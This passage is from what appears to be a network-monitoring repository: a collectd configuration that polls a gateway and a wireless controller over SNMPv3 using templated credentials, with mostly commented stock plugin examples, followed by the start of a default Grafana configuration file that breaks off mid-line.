#LoadPlugin notify_email 146 | #LoadPlugin ntpd 147 | #LoadPlugin numa 148 | #LoadPlugin nut 149 | #LoadPlugin olsrd 150 | #LoadPlugin openldap 151 | #LoadPlugin openvpn 152 | #LoadPlugin perl 153 | #LoadPlugin pinba 154 | #LoadPlugin ping 155 | #LoadPlugin postgresql 156 | #LoadPlugin powerdns 157 | LoadPlugin processes 158 | #LoadPlugin protocols 159 | #LoadPlugin python 160 | #LoadPlugin redis 161 | #LoadPlugin rrdcached 162 | LoadPlugin rrdtool 163 | #LoadPlugin sensors 164 | #LoadPlugin serial 165 | #LoadPlugin sigrok 166 | #LoadPlugin smart 167 | LoadPlugin snmp 168 | #LoadPlugin statsd 169 | #LoadPlugin swap 170 | #LoadPlugin table 171 | #LoadPlugin tail 172 | #LoadPlugin tail_csv 173 | #LoadPlugin tcpconns 174 | #LoadPlugin teamspeak2 175 | #LoadPlugin ted 176 | #LoadPlugin thermal 177 | #LoadPlugin tokyotyrant 178 | #LoadPlugin turbostat 179 | #LoadPlugin unixsock 180 | #LoadPlugin uptime 181 | LoadPlugin users 182 | #LoadPlugin uuid 183 | #LoadPlugin varnish 184 | #LoadPlugin virt 185 | #LoadPlugin vmem 186 | #LoadPlugin vserver 187 | #LoadPlugin wireless 188 | #LoadPlugin write_graphite 189 | #LoadPlugin write_http 190 | #LoadPlugin write_kafka 191 | #LoadPlugin write_log 192 | #LoadPlugin write_redis 193 | #LoadPlugin write_riemann 194 | #LoadPlugin write_sensu 195 | #LoadPlugin write_tsdb 196 | #LoadPlugin zfs_arc 197 | #LoadPlugin zookeeper 198 | 199 | ############################################################################## 200 | # Plugin configuration # 201 | #----------------------------------------------------------------------------# 202 | # In this section configuration stubs for each plugin are provided. A desc- # 203 | # ription of those options is available in the collectd.conf(5) manual page. # 204 | ############################################################################## 205 | 206 | # 207 | # 208 | # #Host "unspecified" 209 | # Plugin "cpu" 210 | # PluginInstance "/[0,2,4,6,8]$/" 211 | # Type "cpu" 212 | # #TypeInstance "unspecified" 213 | # 214 | # SetPlugin "cpu" 215 | # SetPluginInstance "even-%{aggregation}" 216 | # 217 | # GroupBy "Host" 218 | # GroupBy "TypeInstance" 219 | # 220 | # CalculateNum false 221 | # CalculateSum false 222 | # CalculateAverage true 223 | # CalculateMinimum false 224 | # CalculateMaximum false 225 | # CalculateStddev false 226 | # 227 | # 228 | 229 | # 230 | # 231 | # Host "localhost" 232 | # Port "5672" 233 | # VHost "/" 234 | # User "guest" 235 | # Password "guest" 236 | # Exchange "amq.fanout" 237 | # RoutingKey "collectd" 238 | # Persistent false 239 | # StoreRates false 240 | # ConnectionRetryDelay 0 241 | # 242 | # 243 | 244 | # 245 | # 246 | # URL "http://localhost/server-status?auto" 247 | # User "www-user" 248 | # Password "secret" 249 | # VerifyPeer false 250 | # VerifyHost false 251 | # CACert "/etc/ssl/ca.crt" 252 | # Server "apache" 253 | # 254 | # 255 | # 256 | # URL "http://some.domain.tld/status?auto" 257 | # Host "some.domain.tld" 258 | # Server "lighttpd" 259 | # 260 | # 261 | 262 | # 263 | # Host "localhost" 264 | # Port "3551" 265 | # ReportSeconds true 266 | # 267 | 268 | # 269 | # URL "http://localhost/ascent/status/" 270 | # User "www-user" 271 | # Password "secret" 272 | # VerifyPeer false 273 | # VerifyHost false 274 | # CACert "/etc/ssl/ca.crt" 275 | # 276 | 277 | # 278 | # Device "/dev/i2c-0"; 279 | # Oversampling 512 280 | # PressureOffset 0.0 281 | # TemperatureOffset 0.0 282 | # Normalization 2 283 | # Altitude 238.0 284 | # TemperatureSensor "myserver/onewire-F10FCA000800/temperature" 285 | # 286 | 287 | # 288 | # ValuesPercentage false 289 | # ReportDegraded false 290 | # 291 | 292 | # 293 | # URL "http://localhost:8053/" 294 | # 295 | # ParseTime false 296 | # 297 | # OpCodes true 298 | # QTypes true 299 | # ServerStats true 300 | # ZoneMaintStats true 301 | # ResolverStats false 302 | # MemoryStats true 303 | # 304 | # 305 | # QTypes true 306 | # ResolverStats true 307 | # CacheRRSets true 308 | # 309 | # Zone "127.in-addr.arpa/IN" 310 | # 311 | # 312 | 313 | # 314 | # LongRunAvgLatency false 315 | # ConvertSpecialMetricTypes true 316 | # 317 | # SocketPath "/var/run/ceph/ceph-osd.0.asok" 318 | # 319 | # 320 | # SocketPath "/var/run/ceph/ceph-osd.1.asok" 321 | # 322 | # 323 | # SocketPath "/var/run/ceph/ceph-mon.ceph1.asok" 324 | # 325 | # 326 | # SocketPath "/var/run/ceph/ceph-mds.ceph1.asok" 327 | # 328 | # 329 | 330 | # 331 | # CGroup "libvirt" 332 | # IgnoreSelected false 333 | # 334 | 335 | # 336 | # ReportByCpu true 337 | # ReportByState true 338 | # ValuesPercentage false 339 | # 340 | 341 | # 342 | # DataDir "/var/lib/collectd/csv" 343 | # StoreRates false 344 | # 345 | 346 | # 347 | # 348 | # URL "http://finance.google.com/finance?q=NYSE%3AAMD" 349 | # User "foo" 350 | # Password "bar" 351 | # Digest false 352 | # VerifyPeer true 353 | # VerifyHost true 354 | # CACert "/path/to/ca.crt" 355 | # Header "X-Custom-Header: foobar" 356 | # Post "foo=bar" 357 | # 358 | # MeasureResponseTime false 359 | # MeasureResponseCode false 360 | # 361 | # Regex "]*> *([0-9]*\\.[0-9]+) *" 362 | # DSType "GaugeAverage" 363 | # Type "stock_value" 364 | # Instance "AMD" 365 | # 366 | # 367 | # 368 | 369 | # 370 | ## See: http://wiki.apache.org/couchdb/Runtime_Statistics 371 | # 372 | # Instance "httpd" 373 | # 374 | # Type "http_requests" 375 | # 376 | # 377 | # 378 | # Type "http_request_methods" 379 | # 380 | # 381 | # 382 | # Type "http_response_codes" 383 | # 384 | # 385 | ## Database status metrics: 386 | # 387 | # Instance "dbs" 388 | # 389 | # Type "gauge" 390 | # 391 | # 392 | # Type "counter" 393 | # 394 | # 395 | # Type "bytes" 396 | # 397 | # 398 | # 399 | 400 | # 401 | # 402 | # Host "my_host" 403 | # Instance "some_instance" 404 | # User "collectd" 405 | # Password "thaiNg0I" 406 | # Digest false 407 | # VerifyPeer true 408 | # VerifyHost true 409 | # CACert "/path/to/ca.crt" 410 | # Header "X-Custom-Header: foobar" 411 | # Post "foo=bar" 412 | # 413 | # 414 | # Type "magic_level" 415 | # InstancePrefix "prefix-" 416 | # InstanceFrom "td[1]" 417 | # ValuesFrom "td[2]/span[@class=\"level\"]" 418 | # 419 | # 420 | # 421 | 422 | # 423 | # 424 | # Statement "SELECT 'customers' AS c_key, COUNT(*) AS c_value \ 425 | # FROM customers_tbl" 426 | # MinVersion 40102 427 | # MaxVersion 50042 428 | # 429 | # Type "gauge" 430 | # InstancePrefix "customer" 431 | # InstancesFrom "c_key" 432 | # ValuesFrom "c_value" 433 | # 434 | # 435 | # 436 | # 437 | # Driver "mysql" 438 | # DriverOption "host" "localhost" 439 | # DriverOption "username" "collectd" 440 | # DriverOption "password" "secret" 441 | # DriverOption "dbname" "custdb0" 442 | # SelectDB "custdb0" 443 | # Query "num_of_customers" 444 | # Query "..." 445 | # Host "..." 446 | # 447 | # 448 | 449 | 450 | # Device "/dev/sda1" 451 | # Device "192.168.0.2:/mnt/nfs" 452 | # MountPoint "/home" 453 | # FSType "ext3" 454 | 455 | # ignore rootfs; else, the root file-system would appear twice, causing 456 | # one of the updates to fail and spam the log 457 | FSType rootfs 458 | # ignore the usual virtual / temporary file-systems 459 | FSType sysfs 460 | FSType proc 461 | FSType devtmpfs 462 | FSType devpts 463 | FSType tmpfs 464 | FSType fusectl 465 | FSType cgroup 466 | IgnoreSelected true 467 | 468 | # ReportByDevice false 469 | # ReportInodes false 470 | 471 | # ValuesAbsolute true 472 | # ValuesPercentage false 473 | 474 | 475 | # 476 | # Disk "hda" 477 | # Disk "/sda[23]/" 478 | # IgnoreSelected false 479 | # UseBSDName false 480 | # UdevNameAttr "DEVNAME" 481 | # 482 | 483 | # 484 | # Interface "eth0" 485 | # IgnoreSource "192.168.0.1" 486 | # SelectNumericQueryTypes false 487 | # 488 | 489 | # 490 | # SocketFile "/var/run/collectd-email" 491 | # SocketGroup "collectd" 492 | # SocketPerms "0770" 493 | # MaxConns 5 494 | # 495 | 496 | # 497 | # Interface "eth0" 498 | # Map "rx_csum_offload_errors" "if_rx_errors" "checksum_offload" 499 | # Map "multicast" "if_multicast" 500 | # MappedOnly false 501 | # 502 | 503 | 504 | Exec "$user" "/home/$user/scripts/snmp_gw_wlc_troopers.py" "collectd" 505 | 506 | # Exec user "/path/to/exec" 507 | # Exec "user:group" "/path/to/exec" 508 | # NotificationExec user "/path/to/exec" 509 | 510 | 511 | # 512 | # ValuesAbsolute true 513 | # ValuesPercentage false 514 | # 515 | 516 | # 517 | # 518 | # Instance "foodir" 519 | # Name "*.conf" 520 | # MTime "-5m" 521 | # Size "+10k" 522 | # Recursive true 523 | # IncludeHidden false 524 | # 525 | # 526 | 527 | # 528 | # MCReceiveFrom "239.2.11.71" "8649" 529 | # 530 | # 531 | # Type "swap" 532 | # TypeInstance "total" 533 | # DataSource "value" 534 | # 535 | # 536 | # 537 | # Type "swap" 538 | # TypeInstance "free" 539 | # DataSource "value" 540 | # 541 | # 542 | 543 | # 544 | # Host "127.0.0.1" 545 | # Port 7634 546 | # 547 | 548 | 549 | Interface "ens33" 550 | Interface "ens34" 551 | Interface "lo" 552 | # IgnoreSelected false 553 | 554 | 555 | # 556 | # Sensor "some_sensor" 557 | # Sensor "another_one" 558 | # IgnoreSelected false 559 | # NotifySensorAdd false 560 | # NotifySensorRemove true 561 | # NotifySensorNotPresent false 562 | # 563 | 564 | # 565 | # Chain "table" "chain" 566 | # Chain6 "table" "chain" 567 | # 568 | 569 | # 570 | # Irq 7 571 | # Irq 8 572 | # Irq 9 573 | # IgnoreSelected true 574 | # 575 | 576 | # 577 | # JVMArg "-verbose:jni" 578 | # JVMArg "-Djava.class.path=/usr/share/collectd/java/collectd-api.jar" 579 | # 580 | # LoadPlugin "org.collectd.java.GenericJMX" 581 | # 582 | # # See /usr/share/doc/collectd/examples/GenericJMX.conf 583 | # # for an example config. 584 | # 585 | # 586 | 587 | # 588 | # ReportRelative true 589 | # 590 | 591 | # 592 | # Interface "wlan0" 593 | # IgnoreSelected false 594 | # Source "SysFS" 595 | # WatchSet "None" 596 | # WatchAdd "node_octets" 597 | # WatchAdd "node_rssi" 598 | # WatchAdd "is_rx_acl" 599 | # WatchAdd "is_scan_active" 600 | # 601 | 602 | # 603 | # Host "127.0.0.1" 604 | # Port 411 605 | # 606 | 607 | # 608 | # Device "/dev/md0" 609 | # IgnoreSelected false 610 | # 611 | 612 | # 613 | # 614 | # Server "localhost" 615 | # Key "page_key" 616 | # 617 | # Regex "(\\d+) bytes sent" 618 | # ExcludeRegex "" 619 | # DSType CounterAdd 620 | # Type "ipt_octets" 621 | # Instance "type_instance" 622 | # 623 | # 624 | # 625 | 626 | # 627 | # 628 | # Socket "/var/run/memcached.sock" 629 | # or: 630 | # Host "127.0.0.1" 631 | # Port "11211" 632 | # 633 | # 634 | 635 | 636 | # ValuesAbsolute true 637 | # ValuesPercentage false 638 | ValuesPercentage true 639 | 640 | 641 | # 642 | # 643 | # RegisterBase 1234 644 | # RegisterCmd ReadHolding 645 | # RegisterType float 646 | # Type gauge 647 | # Instance "..." 648 | # 649 | # 650 | # 651 | # Address "addr" 652 | # Port "1234" 653 | # Interval 60 654 | # 655 | # 656 | # Instance "foobar" # optional 657 | # Collect "data_name" 658 | # 659 | # 660 | # 661 | 662 | # 663 | # 664 | # Host "database.serv.er" 665 | # Port "3306" 666 | # User "db_user" 667 | # Password "secret" 668 | # Database "db_name" 669 | # MasterStats true 670 | # ConnectTimeout 10 671 | # InnodbStats true 672 | # 673 | # 674 | # 675 | # Alias "squeeze" 676 | # Host "localhost" 677 | # Socket "/var/run/mysql/mysqld.sock" 678 | # SlaveStats true 679 | # SlaveNotifications true 680 | # 681 | # 682 | 683 | # 684 | # Interface "All" 685 | # VerboseInterface "All" 686 | # QDisc "eth0" "pfifo_fast-1:0" 687 | # Class "ppp0" "htb-1:10" 688 | # Filter "ppp0" "u32-1:0" 689 | # IgnoreSelected false 690 | # 691 | 692 | 693 | # # client setup: 694 | Server "127.0.0.1" "25001" 695 | # Server "ff18::efc0:4a42" "25826" 696 | # 697 | # SecurityLevel Encrypt 698 | # Username "user" 699 | # Password "secret" 700 | # Interface "eth0" 701 | # ResolveInterval 14400 702 | # 703 | # TimeToLive 128 704 | # 705 | # # server setup: 706 | # Listen "ff18::efc0:4a42" "25826" 707 | # 708 | # SecurityLevel Sign 709 | # AuthFile "/etc/collectd/passwd" 710 | # Interface "eth0" 711 | # 712 | # MaxPacketSize 1452 713 | # 714 | # # proxy setup (client and server as above): 715 | # Forward true 716 | # 717 | # # statistics about the network plugin itself 718 | # ReportStats false 719 | # 720 | # # "garbage collection" 721 | # CacheFlush 1800 722 | 723 | 724 | # 725 | # URL "http://localhost/status?auto" 726 | # User "www-user" 727 | # Password "secret" 728 | # VerifyPeer false 729 | # VerifyHost false 730 | # CACert "/etc/ssl/ca.crt" 731 | # 732 | 733 | # 734 | # OkayTimeout 1000 735 | # WarningTimeout 5000 736 | # FailureTimeout 0 737 | # 738 | 739 | # 740 | # SMTPServer "localhost" 741 | # SMTPPort 25 742 | # SMTPUser "my-username" 743 | # SMTPPassword "my-password" 744 | # From "collectd@main0server.com" 745 | # # on . 746 | # # Beware! Do not use not more than two placeholders (%)! 747 | # Subject "[collectd] %s on %s!" 748 | # Recipient "email1@domain1.net" 749 | # Recipient "email2@domain2.com" 750 | # 751 | 752 | # 753 | # Host "localhost" 754 | # Port 123 755 | # ReverseLookups false 756 | # IncludeUnitID true 757 | # 758 | 759 | # 760 | # UPS "upsname@hostname:port" 761 | # 762 | 763 | # 764 | # Host "127.0.0.1" 765 | # Port "2006" 766 | # CollectLinks "Summary" 767 | # CollectRoutes "Summary" 768 | # CollectTopology "Summary" 769 | # 770 | 771 | # 772 | # 773 | # URL "ldap://localhost:389" 774 | # StartTLS false 775 | # VerifyHost true 776 | # CACert "/path/to/ca.crt" 777 | # Timeout -1 778 | # Version 3 779 | # 780 | # 781 | 782 | # 783 | # StatusFile "/etc/openvpn/openvpn-status.log" 784 | # ImprovedNamingSchema false 785 | # CollectCompression true 786 | # CollectIndividualUsers true 787 | # CollectUserCount false 788 | # 789 | 790 | # 791 | # IncludeDir "/my/include/path" 792 | # BaseName "Collectd::Plugins" 793 | # EnableDebugger "" 794 | # LoadPlugin Monitorus 795 | # LoadPlugin OpenVZ 796 | # 797 | # 798 | # Foo "Bar" 799 | # Qux "Baz" 800 | # 801 | # 802 | 803 | # 804 | # Address "::0" 805 | # Port "30002" 806 | # 807 | # Host "host name" 808 | # Server "server name" 809 | # Script "script name" 810 | # 811 | # 812 | 813 | # 814 | # Host "host.foo.bar" 815 | # Host "host.baz.qux" 816 | # Interval 1.0 817 | # Timeout 0.9 818 | # TTL 255 819 | # SourceAddress "1.2.3.4" 820 | # Device "eth0" 821 | # MaxMissed -1 822 | # 823 | 824 | # 825 | # 826 | # Statement "SELECT magic FROM wizard WHERE host = $1;" 827 | # Param hostname 828 | # 829 | # 830 | # Type gauge 831 | # InstancePrefix "magic" 832 | # ValuesFrom "magic" 833 | # 834 | # 835 | # 836 | # 837 | # Statement "SELECT COUNT(type) AS count, type \ 838 | # FROM (SELECT CASE \ 839 | # WHEN resolved = 'epoch' THEN 'open' \ 840 | # ELSE 'resolved' END AS type \ 841 | # FROM tickets) type \ 842 | # GROUP BY type;" 843 | # 844 | # 845 | # Type counter 846 | # InstancePrefix "rt36_tickets" 847 | # InstancesFrom "type" 848 | # ValuesFrom "count" 849 | # 850 | # 851 | # 852 | # 853 | # # See /usr/share/doc/collectd-core/examples/postgresql/collectd_insert.sql for details 854 | # Statement "SELECT collectd_insert($1, $2, $3, $4, $5, $6, $7, $8, $9);" 855 | # StoreRates true 856 | # 857 | # 858 | # 859 | # Host "hostname" 860 | # Port 5432 861 | # User "username" 862 | # Password "secret" 863 | # 864 | # SSLMode "prefer" 865 | # KRBSrvName "kerberos_service_name" 866 | # 867 | # Query magic 868 | # 869 | # 870 | # 871 | # Interval 60 872 | # Service "service_name" 873 | # 874 | # Query backend # predefined 875 | # Query rt36_tickets 876 | # 877 | # 878 | # 879 | # Service "collectd_store" 880 | # Writer sqlstore 881 | # # see collectd.conf(5) for details 882 | # CommitInterval 30 883 | # 884 | # 885 | 886 | # 887 | # 888 | # Collect "latency" 889 | # Collect "udp-answers" "udp-queries" 890 | # Socket "/var/run/pdns.controlsocket" 891 | # 892 | # 893 | # Collect "questions" 894 | # Collect "cache-hits" "cache-misses" 895 | # Socket "/var/run/pdns_recursor.controlsocket" 896 | # 897 | # LocalSocket "/opt/collectd/var/run/collectd-powerdns" 898 | # 899 | 900 | # 901 | # Process "name" 902 | # ProcessMatch "foobar" "/usr/bin/perl foobar\\.pl.*" 903 | # 904 | 905 | # 906 | # Value "/^Tcp:/" 907 | # IgnoreSelected false 908 | # 909 | 910 | # 911 | # ModulePath "/path/to/your/python/modules" 912 | # LogTraces true 913 | # Interactive true 914 | # Import "spam" 915 | # 916 | # 917 | # spam "wonderful" "lovely" 918 | # 919 | # 920 | 921 | # 922 | # 923 | # Host "redis.example.com" 924 | # Port "6379" 925 | # Timeout 2000 926 | # 927 | # 928 | 929 | # 930 | # DaemonAddress "unix:/var/run/rrdcached.sock" 931 | # DataDir "/var/lib/rrdcached/db/collectd" 932 | # CreateFiles true 933 | # CreateFilesAsync false 934 | # CollectStatistics true 935 | # 936 | # The following settings are rather advanced 937 | # and should usually not be touched: 938 | # StepSize 10 939 | # HeartBeat 20 940 | # RRARows 1200 941 | # RRATimespan 158112000 942 | # XFF 0.1 943 | # 944 | 945 | 946 | DataDir "/var/lib/collectd/rrd" 947 | # CacheTimeout 120 948 | # CacheFlush 900 949 | # WritesPerSecond 30 950 | # CreateFilesAsync false 951 | # RandomTimeout 0 952 | # 953 | # The following settings are rather advanced 954 | # and should usually not be touched: 955 | # StepSize 10 956 | # HeartBeat 20 957 | # RRARows 1200 958 | # RRATimespan 158112000 959 | # XFF 0.1 960 | 961 | 962 | # 963 | # SensorConfigFile "/etc/sensors3.conf" 964 | # Sensor "it8712-isa-0290/temperature-temp1" 965 | # Sensor "it8712-isa-0290/fanspeed-fan3" 966 | # Sensor "it8712-isa-0290/voltage-in8" 967 | # IgnoreSelected false 968 | # 969 | 970 | # 971 | # LogLevel 3 972 | # 973 | # Driver "fluke-dmm" 974 | # MinimumInterval 10 975 | # Conn "/dev/ttyUSB2" 976 | # 977 | # 978 | # Driver "cem-dt-885x" 979 | # Conn "/dev/ttyUSB1" 980 | # 981 | # 982 | 983 | # 984 | # Disk "/^[hs]d[a-f][0-9]?$/" 985 | # IgnoreSelected false 986 | # 987 | 988 | # See /usr/share/doc/collectd/examples/snmp-data.conf.gz for a 989 | # comprehensive sample configuration. 990 | 991 | 992 | Type "if_octets" 993 | Table true 994 | Instance "IF-MIB::ifName" 995 | Values "IF-MIB::ifHCInOctets" "IF-MIB::ifHCOutOctets" 996 | 997 | 998 | Type "if_octets" 999 | Table true 1000 | Instance "IF-MIB::ifName" 1001 | InstancePrefix "ipv4." 1002 | Values "IP-MIB::ipIfStatsHCInOctets.ipv4" "IP-MIB::ipIfStatsHCOutOctets.ipv4" 1003 | 1004 | 1005 | Type "if_octets" 1006 | Table true 1007 | Instance "IF-MIB::ifName" 1008 | InstancePrefix "ipv6." 1009 | Values "IP-MIB::ipIfStatsHCInOctets.ipv6" "IP-MIB::ipIfStatsHCOutOctets.ipv6" 1010 | 1011 | 1012 | 1013 | Type "wlan_clients" 1014 | Table true 1015 | Instance "SNMPv2-SMI::enterprises.14179.2.1.1.1.2" 1016 | Values "SNMPv2-SMI::enterprises.14179.2.1.1.1.38" 1017 | 1018 | 1019 | Type "aps" 1020 | Table false 1021 | Values "SNMPv2-SMI::enterprises.9.9.618.1.8.4.0" 1022 | #Values "1.3.6.1.4.1.9.9.618.1.8.4.0" 1023 | 1024 | 1025 | # 1026 | # Type "voltage" 1027 | # Table false 1028 | # Instance "input_line1" 1029 | #Instance "IF-MIB::ifDescr" 1030 | # Scale 0.1 1031 | # Values "SNMPv2-SMI::enterprises.6050.5.4.1.1.2.1" 1032 | # 1033 | # 1034 | # Type "users" 1035 | # Table false 1036 | # Instance "" 1037 | # Shift -1 1038 | # Values "HOST-RESOURCES-MIB::hrSystemNumUsers.0" 1039 | # 1040 | # 1041 | # Type "if_octets" 1042 | # Table true 1043 | # InstancePrefix "traffic" 1044 | # Instance "IF-MIB::ifDescr" 1045 | # Values "IF-MIB::ifInOctets" "IF-MIB::ifOutOctets" 1046 | # 1047 | # 1048 | 1049 | Address "$IPv4" 1050 | Version 3 1051 | SecurityLevel "authPriv" 1052 | Username "$user" 1053 | AuthProtocol "SHA" 1054 | AuthPassphrase "$Passphrase" 1055 | PrivacyProtocol "AES" 1056 | PrivacyPassphrase "$Passphrase" 1057 | Collect "gw.bandwidth" "gw.bandwidth.v4" "gw.bandwidth.v6" 1058 | 1059 | 1060 | Address "$IPv4" 1061 | Version 3 1062 | SecurityLevel "authPriv" 1063 | Username "$user" 1064 | AuthProtocol "SHA" 1065 | AuthPassphrase "$Passphrase" 1066 | PrivacyProtocol "AES" 1067 | PrivacyPassphrase "$Passphrase" 1068 | Collect "wlc.clients" "wlc.aps" 1069 | 1070 | 1071 | # 1072 | # Address "192.168.0.2" 1073 | # Version 1 1074 | # Community "community_string" 1075 | # Collect "std_traffic" 1076 | # Inverval 120 1077 | # 1078 | # 1079 | # Address "192.168.0.42" 1080 | # Version 2 1081 | # Community "another_string" 1082 | # Collect "std_traffic" "hr_users" 1083 | # 1084 | # 1085 | # Address "192.168.0.3" 1086 | # Version 1 1087 | # Community "more_communities" 1088 | # Collect "powerplus_voltge_input" 1089 | # Interval 300 1090 | # 1091 | 1092 | 1093 | # 1094 | # Host "::" 1095 | # Port "8125" 1096 | # DeleteCounters false 1097 | # DeleteTimers false 1098 | # DeleteGauges false 1099 | # DeleteSets false 1100 | # TimerPercentile 90.0 1101 | # TimerPercentile 95.0 1102 | # TimerPercentile 99.0 1103 | # TimerLower false 1104 | # TimerUpper false 1105 | # TimerSum false 1106 | # TimerCount false 1107 | # 1108 | 1109 | # 1110 | # ReportByDevice false 1111 | # ReportBytes true 1112 | # 1113 | 1114 | # 1115 | # 1116 | # Instance "slabinfo" 1117 | # Separator " " 1118 | # 1119 | # Type gauge 1120 | # InstancePrefix "active_objs" 1121 | # InstancesFrom 0 1122 | # ValuesFrom 1 1123 | # 1124 | # 1125 | # Type gauge 1126 | # InstancePrefix "objperslab" 1127 | # InstancesFrom 0 1128 | # ValuesFrom 4 1129 | # 1130 | #
1131 | # 1132 | 1133 | # 1134 | # 1135 | # Instance "exim" 1136 | # Interval 60 1137 | # 1138 | # Regex "S=([1-9][0-9]*)" 1139 | # DSType "CounterAdd" 1140 | # Type "ipt_bytes" 1141 | # Instance "total" 1142 | # 1143 | # 1144 | # Regex "\\" 1145 | # ExcludeRegex "\\.*mail_spool defer" 1146 | # DSType "CounterInc" 1147 | # Type "counter" 1148 | # Instance "local_user" 1149 | # 1150 | # 1151 | # 1152 | 1153 | # 1154 | # 1155 | # Type "percent" 1156 | # Instance "dropped" 1157 | # ValueFrom 1 1158 | # 1159 | # 1160 | # Type "bytes" 1161 | # Instance "wire-realtime" 1162 | # ValueFrom 2 1163 | # 1164 | # 1165 | # Type "alerts_per_second" 1166 | # ValueFrom 3 1167 | # 1168 | # 1169 | # Type "kpackets_wire_per_sec.realtime" 1170 | # ValueFrom 4 1171 | # 1172 | # 1173 | # Instance "snort-eth0" 1174 | # Interval 600 1175 | # Collect "dropped" "mbps" "alerts" "kpps" 1176 | # TimeFrom 0 1177 | # 1178 | # 1179 | 1180 | # 1181 | # ListeningPorts false 1182 | # AllPortsSummary false 1183 | # LocalPort "25" 1184 | # RemotePort "25" 1185 | # 1186 | 1187 | # 1188 | # Host "127.0.0.1" 1189 | # Port "51234" 1190 | # Server "8767" 1191 | # 1192 | 1193 | # 1194 | # Device "/dev/ttyUSB0" 1195 | # Retries 0 1196 | # 1197 | 1198 | # 1199 | # ForceUseProcfs false 1200 | # Device "THRM" 1201 | # IgnoreSelected false 1202 | # 1203 | 1204 | # 1205 | # Host "localhost" 1206 | # Port "1978" 1207 | # 1208 | 1209 | # 1210 | ## None of the following option should be set manually 1211 | ## This plugin automatically detect most optimal options 1212 | ## Only set values here if: 1213 | ## - The module ask you to 1214 | ## - You want to disable the collection of some data 1215 | ## - Your (intel) CPU is not supported (yet) by the module 1216 | ## - The module generate a lot of errors 'MSR offset 0x... read failed' 1217 | ## In the last two cases, please open a bug request 1218 | # 1219 | # TCCActivationTemp "100" 1220 | # CoreCstates "392" 1221 | # PackageCstates "396" 1222 | # SystemManagementInterrupt true 1223 | # DigitalTemperatureSensor true 1224 | # PackageThermalManagement true 1225 | # RunningAveragePowerLimit "7" 1226 | # 1227 | 1228 | # 1229 | # SocketFile "/var/run/collectd-unixsock" 1230 | # SocketGroup "collectd" 1231 | # SocketPerms "0660" 1232 | # DeleteSocket false 1233 | # 1234 | 1235 | # 1236 | # UUIDFile "/etc/uuid" 1237 | # 1238 | 1239 | # 1240 | # 1241 | # CollectBackend true 1242 | # CollectBan false # Varnish 3 and above 1243 | # CollectCache true 1244 | # CollectConnections true 1245 | # CollectDirectorDNS false # Varnish 3 only 1246 | # CollectESI false 1247 | # CollectFetch false 1248 | # CollectHCB false 1249 | # CollectObjects false 1250 | # CollectPurge false # Varnish 2 only 1251 | # CollectSession false 1252 | # CollectSHM true 1253 | # CollectSMA false # Varnish 2 only 1254 | # CollectSMS false 1255 | # CollectSM false # Varnish 2 only 1256 | # CollectStruct false 1257 | # CollectTotals false 1258 | # CollectUptime false # Varnish 3 and above 1259 | # CollectdVCL false 1260 | # CollectVSM false # Varnish 4 only 1261 | # CollectWorkers false 1262 | # 1263 | # 1264 | # 1265 | # CollectCache true 1266 | # 1267 | # 1268 | 1269 | # 1270 | # Connection "xen:///" 1271 | # RefreshInterval 60 1272 | # Domain "name" 1273 | # BlockDevice "name:device" 1274 | # InterfaceDevice "name:device" 1275 | # IgnoreSelected false 1276 | # HostnameFormat name 1277 | # InterfaceFormat name 1278 | # PluginInstanceFormat name 1279 | # 1280 | 1281 | # 1282 | # Verbose false 1283 | # 1284 | 1285 | # 1286 | # 1287 | # Host "localhost" 1288 | # Port "2003" 1289 | # Protocol "tcp" 1290 | # LogSendErrors true 1291 | # Prefix "collectd" 1292 | # Postfix "collectd" 1293 | # StoreRates true 1294 | # AlwaysAppendDS false 1295 | # EscapeCharacter "_" 1296 | # 1297 | # 1298 | 1299 | # 1300 | # 1301 | # URL "http://example.com/collectd-post" 1302 | # User "collectd" 1303 | # Password "secret" 1304 | # VerifyPeer true 1305 | # VerifyHost true 1306 | # CACert "/etc/ssl/ca.crt" 1307 | # CAPath "/etc/ssl/certs/" 1308 | # ClientKey "/etc/ssl/client.pem" 1309 | # ClientCert "/etc/ssl/client.crt" 1310 | # ClientKeyPass "secret" 1311 | # SSLVersion "TLSv1" 1312 | # Format "Command" 1313 | # StoreRates false 1314 | # BufferSize 4096 1315 | # LowSpeedLimit 0 1316 | # Timeout 0 1317 | # 1318 | # 1319 | 1320 | # 1321 | # Property "metadata.broker.list" "localhost:9092" 1322 | # 1323 | # Format JSON 1324 | # 1325 | # 1326 | 1327 | # 1328 | # 1329 | # Host "localhost" 1330 | # Port 5555 1331 | # Protocol TCP 1332 | # Batch true 1333 | # BatchMaxSize 8192 1334 | # StoreRates true 1335 | # AlwaysAppendDS false 1336 | # TTLFactor 2.0 1337 | # Notifications true 1338 | # CheckThresholds false 1339 | # EventServicePrefix "" 1340 | # 1341 | # Tag "foobar" 1342 | # Attribute "foo" "bar" 1343 | # 1344 | 1345 | # 1346 | # 1347 | # Host "localhost" 1348 | # Port 3030 1349 | # StoreRates true 1350 | # AlwaysAppendDS false 1351 | # Notifications true 1352 | # Metrics true 1353 | # EventServicePrefix "" 1354 | # MetricHandler "influx" 1355 | # MetricHandler "default" 1356 | # NotificationHandler "flapjack" 1357 | # NotificationHandler "howling_monkey" 1358 | # 1359 | # Tag "foobar" 1360 | # Attribute "foo" "bar" 1361 | # 1362 | 1363 | # 1364 | # 1365 | # Host "localhost" 1366 | # Port "4242" 1367 | # HostTags "status=production" 1368 | # StoreRates false 1369 | # AlwaysAppendDS false 1370 | # 1371 | # 1372 | 1373 | # 1374 | # Host "localhost" 1375 | # Port "2181" 1376 | # 1377 | 1378 | 1379 | Filter "*.conf" 1380 | 1381 | 1382 | -------------------------------------------------------------------------------- /netmon_troopers/grafana.ini: -------------------------------------------------------------------------------- 1 | ###################### Grafana Configuration Example ##################### 2 | # 3 | # Everything has defaults so you only need to uncomment things you want to 4 | # change 5 | 6 | # possible values : production, development 7 | ; app_mode = production 8 | 9 | #################################### Paths #################################### 10 | [paths] 11 | # Path to where grafana can store temp files, sessions, and the sqlite3 db (if that is used) 12 | # 13 | ;data = /var/lib/grafana 14 | # 15 | # Directory where grafana can store logs 16 | # 17 | ;logs = /var/log/grafana 18 | 19 | #################################### Server #################################### 20 | [server] 21 | # Protocol (http or https) 22 | ;protocol = http 23 | 24 | # The ip address to bind to, empty will bind to all interfaces 25 | ;http_addr = 26 | http_addr = 127.0.0.1 27 | 28 | # The http port to use 29 | http_port = 8080 30 | 31 | # The public facing domain name used to access grafana from a browser 32 | ;domain = localhost 33 | 34 | # Redirect to correct domain if host header does not match domain 35 | # Prevents DNS rebinding attacks 36 | ;enforce_domain = false 37 | 38 | # The full public facing url 39 | ;root_url = 